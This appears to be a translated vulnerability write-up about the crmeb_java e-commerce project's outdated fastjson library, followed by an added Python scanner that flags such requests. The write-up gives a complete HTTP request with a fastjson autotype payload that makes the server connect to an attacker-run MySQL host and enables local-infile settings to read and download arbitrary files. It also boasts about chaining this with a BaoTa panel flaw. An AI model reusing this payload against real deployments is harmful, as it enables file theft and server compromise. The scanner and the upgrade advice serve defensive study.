A project with 4.5K stars and 2K forks; it previously used an old version of fastjson, which has been fixed in the new version.
https://gitee.com/ZhongBangKeJi/crmeb_java
It previously used fastjson 1.2.56. For 1.2.68 there is the publicly known fastjson + commons-io AutoCloseable arbitrary file write; the payload works when tested locally, but it cannot be exploited in a real-world scenario.
Citing su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737
Note: because the constructor that fastjson obtains for WriterOutputStream is not unique, this payload does not trigger every time; you have to wait until the constructor with the specified parameters is picked at random. Those testing it can try a few more times and the write will go through. If you have a way to solve this problem, please contact me.
For Spring Boot this is also somewhat impractical; at Black Hat 2021 someone presented a new approach:
It can be combined with the MySQL JDBC driver to make fastjson actively connect to my MySQL server. Based on what we already know, we continue to build the payload, and by additionally setting "allowUrlInLocalInfile":"true","allowLoadLocalInfile":"true","allowLoadLocalInfileInPath":"/",
we get arbitrary file read and arbitrary file download (downloading the jar package); using file:// allows directory listing, and chained with the BaoTa (宝塔) vulnerability it is unstoppable.
show code:
POST /api/public/wechat/gitlab?token=aa HTTP/1.1
Host: 192.168.220.2:8081
Content-Length: 479
Request-Origion: SwaggerBootstrapUi
Accept: */*
X-Requested-With: XMLHttpRequest
Authori-zation:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.220.2:8081
Referer: http://192.168.220.2:8081/doc.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"xxxxx","portToConnectTo":1234,"databaseToConnectTo":"test","info": {"@type":"java.util.Properties","PORT":"1234",
"allowUrlInLocalInfile":"true",
"allowLoadLocalInfile":"true",
"allowLoadLocalInfileInPath":"/",
"maxAllowedPacket":"655360",
"user":"fileread_file:///.","PORT.1":"1234","HOST.1":"xxxxxxxxx","NUM_HOSTS":"1","HOST":"xxxxx","DBNAME":"test"}
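As an added defensive example (not from the original report, su18's repository, or the crmeb_java project), the following Python scanner shows one way to flag request bodies that mix fastjson autotype markers with the Connector/J local-infile properties described above, which is what both the commons-io chain and the JDBC chain have in common at the input layer. The class-name prefixes, the property list and the two sample bodies are constructed assumptions; host and port values are placeholders.

```python
import json
from typing import Any, List

# Added defensive example (not from the original post): flag fastjson request bodies that
# combine autotype markers with MySQL Connector/J properties enabling LOAD DATA LOCAL INFILE.

# @type values that indicate an attempt to steer fastjson autotype toward a JDBC connection.
# Prefix list is an assumption; extend it for the drivers your application actually ships.
SUSPICIOUS_TYPE_PREFIXES = (
    "java.lang.AutoCloseable",
    "com.mysql.jdbc.",
    "com.mysql.cj.jdbc.",
)

# Connector/J properties that, when client-controlled, let a remote server pull local files.
DANGEROUS_JDBC_PROPS = {
    "allowurlinlocalinfile",
    "allowloadlocalinfile",
    "allowloadlocalinfileinpath",
}

# Constructed sample bodies; HOST_PLACEHOLDER is not real infrastructure.
BENIGN_BODY = '{"token":"aa","user":{"name":"alice","roles":["buyer"]}}'
MALICIOUS_BODY = (
    '{"@type":"java.lang.AutoCloseable",'
    '"@type":"com.mysql.jdbc.JDBC4Connection",'
    '"hostToConnectTo":"HOST_PLACEHOLDER","portToConnectTo":3306,'
    '"info":{"@type":"java.util.Properties",'
    '"allowLoadLocalInfile":"true","allowUrlInLocalInfile":"true"}}'
)


def _keep_pairs(pairs):
    # Plain json.loads silently keeps only the last duplicate key, which would hide the
    # double "@type" trick; the "obj" tag lets walk() tell an object from a JSON array.
    return ("obj", list(pairs))


def scan_body(body: str) -> List[str]:
    """Return human-readable findings for one request body; empty list means clean."""
    findings: List[str] = []
    try:
        doc = json.loads(body, object_pairs_hook=_keep_pairs)
    except json.JSONDecodeError:
        return findings  # not JSON at all; leave it to other checks

    def walk(node: Any, path: str) -> None:
        if isinstance(node, tuple) and node[0] == "obj":
            pairs = node[1]
            type_values = [v for k, v in pairs if k == "@type"]
            if len(type_values) > 1:
                findings.append(f"{path}: duplicate @type keys {type_values}")
            for v in type_values:
                if isinstance(v, str) and v.startswith(SUSPICIOUS_TYPE_PREFIXES):
                    findings.append(f"{path}: @type {v}")
            for k, v in pairs:
                # Lower-cased so that case variants of the property name are still caught.
                if k.lower() in DANGEROUS_JDBC_PROPS:
                    findings.append(f"{path}.{k}: JDBC local-infile property = {v!r}")
                walk(v, f"{path}.{k}")
        elif isinstance(node, list):
            for i, v in enumerate(node):
                walk(v, f"{path}[{i}]")

    walk(doc, "$")
    return findings


def is_suspicious(body: str) -> bool:
    return bool(scan_body(body))


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, scan_body(body))
```

Running it on the constructed malicious body yields five findings (the duplicate @type pair, each of the two suspicious @type values, and the two local-infile properties); the benign body yields none. Detection of this kind belongs at a WAF or request-logging layer and only complements the real fix the report points to: upgrading fastjson (1.2.68 and later offer safeMode, which disables autotype entirely) so that client JSON can never select the class being instantiated.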